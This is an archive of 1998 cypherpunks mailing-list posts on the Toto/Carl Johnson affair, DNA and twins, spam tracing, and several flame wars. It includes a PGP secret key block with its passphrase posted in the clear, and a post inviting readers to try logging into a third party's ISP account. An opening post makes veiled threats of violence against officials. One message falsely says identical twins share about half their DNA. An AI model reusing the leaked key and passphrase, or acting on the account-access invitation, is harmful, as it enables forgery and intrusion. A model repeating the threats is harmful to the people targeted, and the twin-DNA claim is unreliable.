  Am *I* going to whack you out? Maybe...
  I would prefer just dumping some tea in Boston Harbor, if that
will get my message across in MeatSpace, but if it won't, then
I guess I will have to take stronger action.
  There are undoubtedly a plethora of LEA's ready and willing to
prosecute and imprison me for agreeing with Patrick Henry, who
said, "Give me liberty, or give me death." The irony, of course,
is that I do not pose a great danger to anyone but myself as
long as I continue to have my human rights and my liberty
unthreatened.

  The chances of me actually getting off of my fat butt and
going out into the real world to whack out the enemies of
freedom are probably pretty small (unless I run out of 
cigarettes and beer, and wouldn't have to make an extra 
trip).
  I fully understand that this does not lessen the potential
of any LEA who gets a wild hair up their butt to throw a
mountain of taxpayer resources into prosecuting me and 
imprisoning me for their own professional/political gain.
  However, if you are performing actions so outrageously against
basic human rights and freedoms as to get me off of my lazy ass,
then I am the least of your problems, because there undoubtedly
are millions of people more functional than myself (who get out
of the house and go further than the liquor store) who are less
willing than myself to put up with increasingly heavy chains
placed around their hands and feet 'in the interests of national
security.'

  Feel free to have the Federales break down my door and
imprison me for pointing out the obvious. After all, I fit
the profile of a domestic terrorist--I quote the Constitution 
and the Bill of Rights, and I speak out against increasingly
big government.
  But remember...it's the quiet ones you've got to watch...
If you force everyone to 'be quiet', then you've got a world
of trouble on your hands.

Sincerly,
John Gilmore <gnu@toad.com>
~~~~~~~~~~~~~~~~~~~~~~~~~~~
p.s.
NOTICE TO LEA AGENTS IN NEED OF A CAREER BOOST!
  Yes, I'm just a troublemaking asshole, trying to get John
<spit> Gilmore <fart> in trouble.
  However, if you want to go to the trouble of tracking me 
down, I will give you some hints, since it seems likely that
anyone who has trouble finding a ton of cocaine at an 
airport might not be competent in CyberSpace, either.
  You might want to check with the Webmasters at the sites
quoted above to see who has accessed their web sites this
morning. The anonymous remailer I will be using is an open
secret to CypherPunks around the world as a really bad 
attempt at disguising my true MeatSpace identity. This alone
ought to be enough for some aggressive young LEA and/or
federal prosecutor to earn themself some brownie-points,
since I am a sorry enough son-of-a-bitch that they would not
have much trouble convicting me in front of a jury of 'their'
peers, assuming that they can make certain that I am not 
tried by a jury of my own peers.

Bonus Points:
  I can also be tied into Jim Bell's Worldwide Conspiracy to 
assassinate government authorities, through my implementation
of an Assassination Bot.
 (I am willing to 'rat out' Jim for two bottles of Scotch. If
 he is willing to rat _me_ out for less, then I guess it's
 just my hard luck, eh? <--that's another hint!)

p.p.s.
  You can also charge me with use of 'conventional' encryption
in the commission of a crime.
  Must be your lucky fucking day, eh?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNI24Hs5WpAclQcU1AQFaggP8CPTVy8EAY3JbIG94frc3C70MW0hUznmp
fRgBrq7m5tLGjX7fh3/s4fpTnQi+xUvRUroFETlR6KhM3srSy456wovpFlcLp7uc
xk31cRPEroFhO9NRVBUjzToCj78iDvdGm9QXUwLctbbohpdId/KKLTAUM6//4mCB
i/9oezfegWc=
=4/6E
-----END PGP SIGNATURE-----

[2]
======================================================================
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzRiaHcAAAEEAPdnnUJRJoktl6tMtRcrV330FvNPok4FvTMOT82V0lIRA7ZQ
jiAcv4Egm8nx6M6dc75eWIIPo4gZOWf5xjZzN8XjD2ytwMNqQnis0RMN9OI8ysk2
I7frJO0FNLikupHf+tUMhDc52qQbOcsVC53GZ8FdwY1zzaX7Dc5WpAclQcU1AAUR
tB9zb24gb2YgZ29tZXogPEluZm9XYXJAZGV2Lm51bGw+iQCVAwUQNGJph85WpAcl
QcU1AQFXPQQA8adaDwM3DnttrJPTjUd9I/fQ6q73Zvp6oLPP3MSon4uEbIVJryPB
wZYfcjXb6Co84XFpaL8shtgP0cHYRZDfQraCwsaJWOm1Lh+ZhZyqHh2oF4QrpOhm
A5YzxYI7SX3GIu/X1XO5vcb+BnJqbl2+RUaHnGqcwwrwxjSc1stGwJ4=
=Yx4A
-----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.2

lQHgAzRiaHcAAAEEAPdnnUJRJoktl6tMtRcrV330FvNPok4FvTMOT82V0lIRA7ZQ
jiAcv4Egm8nx6M6dc75eWIIPo4gZOWf5xjZzN8XjD2ytwMNqQnis0RMN9OI8ysk2
I7frJO0FNLikupHf+tUMhDc52qQbOcsVC53GZ8FdwY1zzaX7Dc5WpAclQcU1AAUR
AUzSerlWWdq7A/+EGrDs3oHlVDzmPEouO2m1gWLN6erKPgd5tiB7eWECJoiRC9AU
Va2LJLxltmNKIq9znAMeeCpI3nirprYgHMvyASVPrXIo4WXB0NGSyTXSGFbmbfBA
ZhIzgLYfSV7KC9e340B4wqQv/hSGyc9p7/umXgdccspoXM4fIwddYNt0+QIA+XS0
WUPNqr4lyW47GVAhFIuoYsTLi+ZTRRQbS2LAyV2dhGSFVo1Q1HrB/S58dQFTaN85
lRytpZKX2dc+9VC3JgIATZegUu3m2FmRMf7kr0IsRV94q0lxQm4egMPdru6CQGZl
G7K9uGX/d/Rbtd0iP7aZ1iNDpgSakmNl5o3aYupCdQIAir0t68n1g91DzWwOMJKF
7E9fmQ21a7a2rDGk+5SV9nw3PxGwx/64CPHriDQz/ItYLPZKpHVLysuFGavYUFX/
26JZtB9zb24gb2YgZ29tZXogPEluZm9XYXJAZGV2Lm51bGw+
=yYBi
-----END PGP SECRET KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Thu, 15 Oct 1998 02:10:19 +0800
To: cypherpunks@toad.com
Subject: RE: DNA
Message-ID: <013D438ED22ED2119F630060082F763C08A8F2@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: X [mailto:xasper8d@lobo.net]
> Sent: Wednesday, October 14, 1998 10:00 AM
> Cc: cypherpunks@toad.com
> Subject: RE: DNA
> 

[snip]

> so explain why my brother has smooth
> hands and fingers with almost no 
> prints (lucky bastard!) and mine look 
> like mother teresa's face... 

Wear-and-tear?

> (probably more now than before, eh?)

Yecch!


\\/alter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 21:47:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <199810141153.MAA29777@server.eternity.org>
Message-ID: <199810141304.OAA30401@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I realised that the private key for son of gomez is passworded, but it
turns out that the password is one of the set John Young forwarded to
the list from an anonymous source a few weeks back: sog709cejCJP

yeah :-)

AdamMonger

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBNiShUc5WpAclQcU1AQG/eQP/Q46OesAxpXbrrM2njCdcoFLYUq6Qh0oQ
giOvubEpoF5zZ6k1od3Nv8UIrUo2AWmdqqDp0bI6F07zsgSBAKEFB2QOKQcbkTsX
TNFnVj17v81jG6ttLpHDofDji9rtajbZ2stalVcZ98gGBuJ64zgO2AbTY3hMljJ1
fJMYI176KlQ=
=psAV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 15 Oct 1998 05:37:26 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Two Jims, Werner and Matt redefine socialism for their own en ds
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A62@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> >> something like Belloc and Chesterton's "distributivism".
> 
> > Distribute what and created by whom? 
>
> Every libertarian or cypherpunk ought to have read "The Servile State"
> by Hilaire Belloc. ...and in that context what is being distributed is

> *land*, as private property to be lived on, farmed and passed on to 
> children. 

If you believe there is a single valid concept in that whole
populist/agrarian bullshit I can shoot it down, otherwise it is not
worth my time.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 21:22:42 +0800
To: cypherpunks@toad.com
Subject: anti-spam lesson Re: Earn your worth not mlm!!! 330-258-9131
Message-ID: <199810141250.OAA17845@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


this guy knows this is a mailing list by the way he forged the from header. 
he knew the administrator address for the list.   Quick anti-spam note  by
looking at the received header all the way on the bottom of all of them we
see that the originating host was:
a modem slip account from detroit michigan on the at&t service.

that is about the best we can do as far as establishing this persons
identity, but a copy of the message including the headers forwarded to abuse
or postmaster @att.net of the message will have the problem resolved in no
time.  If everyone takes 2 min to do this it will definiately get the
account removed.  I guess I just do this for revenge though.  It is fun
getting all of the cancellation notices in your e-mail.'


Received: from www.video-collage.com [206.15.171.132] by mx05 via mtad (2.6)

with ESMTP id mx05-cJNB5S0058; Wed, 14 Oct 1998 01:56:46 GMT 
Received: (from ichudov@localhost) 
by www.video-collage.com (8.8.5/8.8.5) id VAA07486 
for cypherpunks-outgoing; Tue, 13 Oct 1998 21:49:42 -0400 (EDT) 
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2]) 
by www.video-collage.com (8.8.5/8.8.5) with ESMTP id VAA07474 
for <cypherpunks@algebra.com>; Tue, 13 Oct 1998 21:49:38 -0400 (EDT) 
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.8.8) id
SAA17622; Tue, 13 Oct 1998 18:53:38 -0700 (PDT) 
Received: from cyberpass.net (cyberpass.net [209.75.197.3]) by
sirius.infonex.com (8.8.8/8.8.8) with ESMTP id SAA17594 for
<cpunks@sirius.infonex.com>; Tue, 13 Oct 1998 18:53:30 -0700 (PDT) 
Received: from toad.com (toad.com [140.174.2.1]) by cyberpass.net
(8.8.8/8.7.3) with ESMTP id SAA15571 for <cypherpunks@cyberpass.net>; Tue,
13 Oct 1998 18:54:56 -0700 (PDT) 
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA13884
for cypherpunks-unedited-outgoing; Tue, 13 Oct 1998 18:41:58 -0700 (PDT) 
From: owner-cypherpunks@toad.com 
Received: from 12.67.146.158 (158.detroit-03.mi.dial-access.att.net
[12.67.146.158]) by toad.com (8.7.5/8.7.3) with SMTP id SAA13879 for
<cypherpunks@toad.com>; Tue, 13 Oct 1998 18:41:54 -0700 (PDT) 
Date: Tue, 13 Oct 1998 18:41:54 -0700 (PDT) 
Message-Id: <199810140141.SAA13879@toad.com> 
To: cypherpunks@toad.com 
Subject: Earn your worth not mlm!!! 330-258-9131 
Sender: owner-cypherpunks@Algebra.COM 
Precedence: bulk 
X-Mailing-List: cypherpunks@algebra.com 
X-List-Admin: ichudov@algebra.com 
X-Loop: cypherpunks@algebra.com 


-----BEGIN PGP SIGNATURE-----
Version: PGP 5.5.3ckt http://netnet.net/~merlin/knights
Comment: KeyID: 0xF4D1901B
Comment: Fingerprint: DB49 2BFA 856F 0B7E  CB78 9C3E 0167 279D

iQEVAwUBNiSaAqKPqmf00ZAbAQHHZAf/XYUh5eybbUnOGTW0Bc10sF+rdvs5sJ/h
CI2WCoHY6l/+8PxVHlphFqcXeXoE0i3o84eb75THNI8+fTdXmZsffK0jJOjoO+Xa
TamPL5nMsCJHOTSFHUGIsvlvPLQvxWTkkRepfPcrQnA0MVCGxlHteXlRmh2J496/
OWEqfRp+iBgpptVdgG18u+IRG8KBWz/e3RQk5LjzhO0szz5x47S0wsTru4HHwLhh
ZUsUX7CxZ8vwK6nty0RgYslk56wyAXCwoHU3/S6C+rHabzJptT/mFZUpRHmsVu3L
aWOKpRY/vcXH6NUAQU1dDW4wh/DU3KXWwISJfItjl8u37HiEofmq0A==
=b4+H
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 17 Oct 1998 00:02:06 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: IP: ISP not liable for customer's messages
In-Reply-To: <199810160639.BAA18347@wire.insync.net>
Message-ID: <Pine.BSF.3.91.981014145345.29120A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 16 Oct 1998, Eric Cordian wrote:

> 
> > An appeals court in Florida has ruled against a woman who sued 
> > America Online because one of its customers, a convicted sex 
> > offender, used an AOL chat group to try to sell the woman's 
> > 11-year-old son a pornographic video. The court said that federal law 
> > protects online services from being held liable for the messages 
> > transmitted by their members sell the videotape of the boy. The 
> > defeated lawsuit, which is being appealed to the Supreme Court, tried 
> > to characterize America Online as "a home shopping network for 
> > pedophiles and child pornographers."  (AP/Washington Post 15 Oct 98)
> 
> As I recall, the individual was trying to sell a pornographic video
> featuring the woman's 11 year old son, which is another thing entirely.
> 

Not really. If the service providor is to be held accountable for what 
its members post/say/etc., they would have to monitor *all* traffic in 
order to police their members. In addition, even if the providor *were* 
monitoring, they can only be reactive - do you expect them to monitor and 
censor all traffic before releasing it?

Looks like an attempt to bring in a "deep pockets" defendant.

-r.w.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 14 Oct 1998 21:52:35 +0800
To: cypherpunks@toad.com
Subject: son (Gomez is coming!)
Message-ID: <199810141319.PAA20572@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Son of Mother Of All Chapters -- SPACE ALIENS HIDE MY DRUGS!!!
_________________________________________________________

July, 1948:
The moment has come when the costumes, the grease paint, the falsely

colored scenery, the technicolored spotlights and all the other artifices
of 
makeYDup should be put aside and, in the interest of truth, the solid
facts 
about the play and the players revealed to the people. 
~ The Roosevelt Myth, Preface to the Popsvox PublishingR edition 

Dec. 7, 1941
The Lake of Life has started to turn over. The bottom is rising to
the top, the 
top is descending to the bottom, and everything is becoming the opposite
of 
what it seems to be.
~ Vice-Admiral B. D'Shauneaux, USN

~~~
~~~

Version 1.7, Rev B:
Saturday morning, March 4, 1933...the conquering Democrats poured into

the city...
Only a week before an assassin's bullet had barely missed Roosevelt.
It
struck Anton Cermak, the Bohemian mayor and boss of Chicago, who with

Al Smith, had opposed Roosevelt's nomination...and died a few days
later. 

Version 2.7, Rev. 3:
On February 1, 1933, in Miami, Florida Giuseppe Zangara fired five
shots a President-elect Franklin D. Roosevelt, who was making an 
impromptu speech while sitting in an open car that had stopped momentarily.

Although none of the shots hit President Roosevelt, Zangara mortally

wounded Anton Cermak, the Mayor of Chicago, and hit four other people,
including a Secret Service agent.

Version 3.9, Rev. 2-B:
On February 15, 1933, Zangara attended a speech given by Roosevelt
at 
Bayfront Park in Miami, Florida.
When Roosevelt had finished his talk and was preparing to leave, Zangara

pulled out a pistol and opened fire.
Zangara wounded five people who had been near the president-elect,
two of 
them seriously. Most critically injured was Chicago Mayor Anton Cermak,

who was struck by the bullet in the chest which then lodged in his
spine. 

Version 4.9, Rev. 8C:
The parade car moved slowly down the street as President-elect Roosevelt

and Mayor Cermak smiled and waved. The car stopped and President-elect

Roosevelt gave a speech while sitting on the back of the car. A man
named 
Guiseppe Zangara pushed through the crowd. He fired five shots at the

President-elect. The bullets hit four people and Mayor Cermak.

Version 15.6, Rev. 7:
On March 6, Mayor Cermak died from complications stemming
from the shooting. The same day Zangara was indicted by a
grand jury and charged with first degree murder in the death of
Cermak. His trial began on March 9 and ended on March 11
with a guilty verdict and a death sentence. The prisoner was
transported to the Florida State Prison at Raiford, where he was
executed on March 20, 1933. 

Version 18.9, Rev. 5D:
Mayor Anton J. Cermak died three weeks later, on March 8, 1933. His

body was taken back to Chicago and buried in the Bohemian National

Cemetery.
Guiseppe Zangara was executed in the electric chair on March 21, 1933.

That was only 13 days after Mayor Cermak died.

Version 32.9, Rev. 12:
Consider the case of Guiseppe Zangara, who was executed in 1933 for
the

attempted assassination of President-elect Franklin D. Roosevelt in
which 
Chicago Mayor Anton J. Cermak was fatally shot. Zangara pleaded guilty
in 
state court on March 10, was sentenced to death, and was executed on
March 20 -- an interval of 10 days!

Version 82, Rev. 5Q:
After Roosevelt had delivered a speech in Florida on February 14, 1938,

Guiseppe Zangara, an unemployed bricklayer, fired six shots from a
handgun 
at Roosevelt from twelve yards away. The president-elect, who was sitting
in an open car, was uninjured but five other people were shot, including

Chicago mayor Anton Cernak, who was killed. 

Version 95, Rev. 8:
On February 15, 1933, Guiseppe Zangara rose early...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 15 Oct 1998 05:37:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: DNA (fwd)
Message-ID: <199810142112.QAA13929@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: DNA
> Date: Wed, 14 Oct 1998 12:34:07 -0700

> > But what about identical sib's.  They all
> > have exactly the same DNA!

Actualy identical twins will only share about 50% of their DNA. They get 50%
from each parent randomly. This means that only about 25% of the DNA will
match their sibling from either parent.

> Or a clone ;). 

This of course ignores transcription errors, environment issues, etc. It is
possible that even a clone would have protein discrepencies which trace back
to DNA strands that end up different than the original source organism. As
the organism develops and ages these issues can become quite important. This
aspect of DNA matching has gotten the short shift for sure.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 15 Oct 1998 00:23:01 +0800
To: cypherpunks@cyberpass.net
Subject: more Toto keys... so what's it all mean
Message-ID: <199810141529.QAA32138@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Someone asked me in email what the meaning of the last 3 posts I made,
the plethora of public and private keys, discrete log attacked,
deadbeefed, forged, factored, decrypted etc. getting confusing.

The 3 messages I wrote this morning go together, -- they are all on
the same post by anonymous/Toto, just me realising more things about
it.  Here's what happened (play along if you like):

a) I tried fetching the key the message was encrypted to (try to
decrypt it -- it will tell you what keyid you need) from a keyserver

b) I noticed that the public key I fetched is the 384 bit blacknet key
which Paul Leyland broke (clue was the key on the keyservers is
revoked, and only 384 bits, which made me remember Leyland's
factoring attack),

c) used altavista to find Leyland's announce to sci.crypt a few years
back which included the private key he obtained by factoring the 384
bit blacknet public key

d) decrypted the message with the blacknet private key, 

e) inside the message was a public and private key, at this point
whoopee yet another Toto key (post 1), 

f) wondered if this key was the one which signed the messages the IRS
has incarcerated CJ over, checked the signature, yes! (post 2),

g) tried to sign a message with the key -- oops it has a password
because the private key is encrypted, 

h) tried the passwords that John Young forwarded to the list a few
weeks back from some anonymous source, yup one of them decrypts the
private key, and we are able to make signatures! (post 3).


As to what it means -- it means that one or more others could have
been the author of the message the IRS claim Carl Johnson wrote.  Heck
anyone could sign posts with that key now.

The allegations that CJ was sharing the "carljohn" account at
sympatico with hackers may also be interesting especially if anyone is
still able to verify that the account details are correct (who knows
-- maybe the account is still active! -- anyone want to try?), because
it throws even further into doubt (aside from the doubt arising from
the numerous forgeries surrounding Toto) the IRS presumption that all
things apparently sent from sympatico were written by CJ ...

Perhaps Jeff and fellow IRS agents could ask sympatico if they are
able to verify the validity of the account details.

Adam
-- 
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marty Levy" <rwww60@email.sps.mot.com>
Date: Thu, 15 Oct 1998 09:35:04 +0800
To: cypherpunks@toad.com
Subject: Re: DNA
In-Reply-To: <000401bdf77a$fe720d00$932580d0@xasper8d>
Message-ID: <3624C5C3.F563A50F@email.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



Because the fingerprint pattern is not genetically pre-determined.  It is
apparently part of the fetal development process.  Minor environmental
differences and random cell division differences will make the prints
different even between identical twins.

X wrote:

> DNA of identical siblings is identical?  I guess that makes sense, since
> we're really split after conception...  so explain why my brother has smooth
> hands and fingers with almost no prints (lucky bastard!) and mine look like
> mother teresa's face... (probably more now than before, eh?)
>
> X
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 15 Oct 1998 00:50:39 +0800
To: jim@acm.org
Subject: attribution for 384 bit BlackNet factoring (Re: ATTN:, sog's keys 4 sale)
In-Reply-To: <3624BFD1.7BB0BF77@acm.org>
Message-ID: <199810141615.RAA32755@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Jim Gillogly writes:
> Adam Back writes:
> > Type Bits/KeyID    Date       User ID
> > pub   384/5A5AD16B 1994/02/11 *** KEY REVOKED ***
> >                               BlackNet<nowhere@cyberspace.nil>
> >
> > A revoked key, and a rather small key size, this rings a bell, some of
> > you may recall that some time ago Paul Leyland factored that key.
> 
> For the record, that key was factored by a team consisting of Paul Leyland,
> Arjen Lenstra, Alec Muffett, and Jim Gillogly.

Yes sorry about that.  The name that I remembered in association with
the attack was Leyland, probably because he posted the announce.

Credit where credit is due.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 15 Oct 1998 05:54:38 +0800
To: cypherpunks@cyberpass.net
Subject: Tim May Investigations
Message-ID: <v04020a31b24ac5084d57@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



And here I thought Tim was born in Virginia, or something...

;-).

Cheers,
Bob Hettinga

--- begin forwarded text


> Date: Wed, 14 Oct 1998 17:00:01 -0400
> From: rah-web <rah@shipwright.com>
> Reply-To: rah@shipwright.com
> Organization: Philodox
> MIME-Version: 1.0
> To: rah@shipwright.com
> Subject: Tim May Investigations
>
> http://www.fwp.net/timmayinvestigations/
> 	 		 
>
>  		 	 	 		 
> 			P.O. Box 3081, Frederick, MD 21705
> Voice: 301.695.2662 or 800.723.7026
> Fax: 301.695.4009 / Email: <mailto:TMayDetect@aol.com> TMayDetect@aol.com
>
>
> Providing the "ABC's" of Professional Investigations:
>
>
>
> AFFORDABLE
> BUSINESSLIKE
> CONFIDENTIAL
>
>
>
> LOCAL * NATIONAL * INTERNATIONAL
> 24 HOUR SERVICE
>
> 			We offer complete professional services for any and all
>types of professional investigations:
>
>
>
> Civil & Criminal Investigations
> Background Checks/Polygraphs
> Worker's Compensation Cases
> Security Analysis
> Credit & Bad Debt Services
> Child Custody & Support
> Domestic Relations
> Missing Persons
> Fire/Arson Investigations
> Explosives Scene Analysis
> Fire Code Investigations
> Body Guard - Armed/Unarmed
> Private Process Service
> Skip Tracing
> Debugging
> Corporate Services Package
> Seminars and Workshops on Workplace Violence
>
> 			Call for your FREE Initial Consultation!
>
>
>
> 			Profile of Tim May, President of Tim May Investigations
>
> 			"The sensitive nature of investigative services is reflected
>in the attitude we promote. While 			discretion and
>confidentiality are our highest priorities, we place great importance on
>providing 			you with expert and concise counseling and
>impartial documentation." --Tim May
>
> 	Mr. May currently serves as a Judge for Probate Court
>
> Senior investigator/explosive technician with the Office of the State
>Fire Marshall of Maryland 			from 1974-1983. Prior to that, Mr.
>May served as a police officer and Police Chief in Maryland.
>
> Former Department Chairman of the Arson Mitigation Division at the
>National Fire Academy.
>
> Consultant and Instructor to the Bureau of Alcohol, Tobacco, & Firearms
>(ATF), Federal Bureau 			of Investigation (F.B.I.), and expert
>witness for U.S. Department of Justice and U.S. Attorney.
>
> Mr. May has testified as an expert on arson, explosives, hazardous
>materials, criminal and civil 			investigations, and is
>qualified in District, Circuit, and Federal Courts, as well as
>International Courts.
>
> Successful completion of several high profile national cases has earned
>world-wide recognition, 			providing contracts with foreign
>governments and corporations.
>
> Adjunct member and lecturer to several state universities, colleges, and
>associations.
>
>
> 			 Investigative Services
>
> 			Our associates are selected and employed by us because they
>have a proven record based on a 			successful balance of
>technical experience and personal characteristics. Each member of our
>staff 			has undergone extensive training in all aspects of
>investigative methodology. These skills and 			procedures are
>constantly updated as the rules of evidence and judicial requirements
>undergo 			revisions at local and national levels. Our ability to
>work closely with clients and their legal 			representatives has
>earned us an outstanding reputation nationally.
>
> 			In the 90's, investigative services are a $400 billion
>dollar a year industry. An ever-increasing 			number of
>individuals, businesses, and organizations are utilizing their legal
>rights to increase 			security and gain piece of mind. Quality
>investigative services can protect you from losing money 			in
>lawsuits and damages claims, and even recover losses you may have
>experienced.
>
> Exercise your right to know!
>
>
>
> 			Why Consider Investigation?
>
>
>
> 57% of all U.S. businesses use an investigative agency to verify they are
>hiring the right employee:
> 			credentials, drug screening, criminal records, employment
>history, and past violent behavior.
> You have a FEDERAL RIGHT to know who you are hiring and/or contracting
>with.
> 30-40 million people (1/3 - 1/4 of the workforce) have a criminal record
>according to the U.S. Department of Labor.
> YOU can be liable for NOT conducting background checks in certain
>situations.
> YOU can be liable for negligent hiring and retention, and for allowing
>some conditions such as sexual harassment or stalking to occur unreported.
>
> 65%-75% of all merchandise losses were the result of employee theft.
>
>
>
> 			Why take chances...Call Now! 301 695-2662
>
>
>
>
> 			We offer affordable rates...
>
> 			Like everything else, there is a wide-range of fees charged
>in the service-provider market. We 			recognize that each
>client has unique requirements - whether they are of a security,
>protective, or 			investigative nature, or a combination of
>each.
>
> 			Since our first goal is to understand your needs, you will
>only pay for actual services provided - as 			discussed. Our fee
>schedule is based on time, personnel involved, degree of technical and
>		supervisory support, and the extent of case preparation, where
>necessary.
>
> 			The projected cost is provided after a FREE initial
>consultation. We believe this approach allows 			the maximum
>degree of confidence and peace of mind.
>
>
> 			Your Full Service Agency. . .
> Tim May Investigations
> 			P.O. Box 3081, Frederick, MD 21705
> Voice: 301.695.2662 or 800.723.7026
> Fax: 301.695.4009 / Email: <mailto:TMayDetect@aol.com> TMayDetect@aol.com
>
>
> You are Vistor Number	293 Since January 20, 1998
>

--- end forwarded text

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 15 Oct 1998 06:13:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gary Burnore vs. Earth (Was: Value of Annon. Remailers)
Message-ID: <199810142147.RAA08216@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Anonymous <nobody@replay.com>
   >
   >   Information Security <guy@panix.com> wrote:
   >
   >   > Let us know when you have an original thought.
   >
   >   Ad hominem often comes in handy...

You are too touchy to be on the Internet, leave now! ;-)

   >   >    >   From: Missouri FreeNet Administration <sysadmin@mfn.org>
   >   >    >
   >   >    >   Obviously, as defenders of this man's right to post material offensive
   >   >    >   to Burnore, we too came under attack.
   >   > 
   >   > One man's attack is another's defense.
   >
   >   I'll have to remember that one.  Some defense lawyers in Wyoming
   >   might want to use it in their clients' trial for their "defense"
   >   against that gay student.

You are equating speech to physical violence.

Not a good way to defend anonymizers.

   >   Now about Gary Burnore's "defense" against the underaged daughter of
   >   his girlfriend...

Like, why should cypherpunks care? You said it's not causing
you a connectivity problem.

You are boring everyone for no known reason.

   >   >    >    The point here is that what little survives about this lunatic child
   >   >    >   molester (he has even successfully had his North Carolina Sex Offender record
   >   >    >   removed!),...
   >   > 
   >   > Gee, why don't you ask North Carolina why, in writing?
   >
   >   Irrelevant.  The North Carolina website of registered sex offenders
   >   was only the vehicle by which the truth about Gary Burnore's
   >   existing conviction in California became known.  Depublishing it in
   >   NC on some technicality...

What technicality?

   >   which sentenced him to probation and required him to register
   >   as a sex offender.

I wonder if Pee Wee Herman had to register.

   >   Perhaps the original whistleblower's e-mailed warnings led
   >   or contributed to Burnore's arrest, and to the resulting
   >   psychiatric treatment which may have protected future
   >   potential victims.

Just a bunch of nutters flaming each other endlessly.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 15 Oct 1998 09:28:11 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: DNA (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A69@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Monozygotic [maternal] twins do have the same DNA. Hence they are
identical. Genetically identical that is, there are non-genetic
variations. Dizygotic [fraternal] twins do not. Fraternal twins can be
visually nearly identical, but they are not genetically identical.

Clones on the otherhand and have identical nuclear DNA, but are not
necessarily identical because some early development processes rely on
maternal genome material and not nuclear DNA, and depending on the
cloning process they may have different mitochondrial DNA (mtDNA).

	Matt


> -----Original Message-----
> From: Jim Choate [mailto:ravage@einstein.ssz.com]

> > > But what about identical sib's.  They all
> > > have exactly the same DNA!
> 
> Actualy identical twins will only share about 50% of their 
> DNA. They get 50% from each parent randomly. This means 
> that only about 25% of the DNA will match their sibling 
> from either parent.
> 
> > Or a clone ;). 
> 
> This of course ignores transcription errors, environment 
> issues, etc. It is possible that even a clone would 
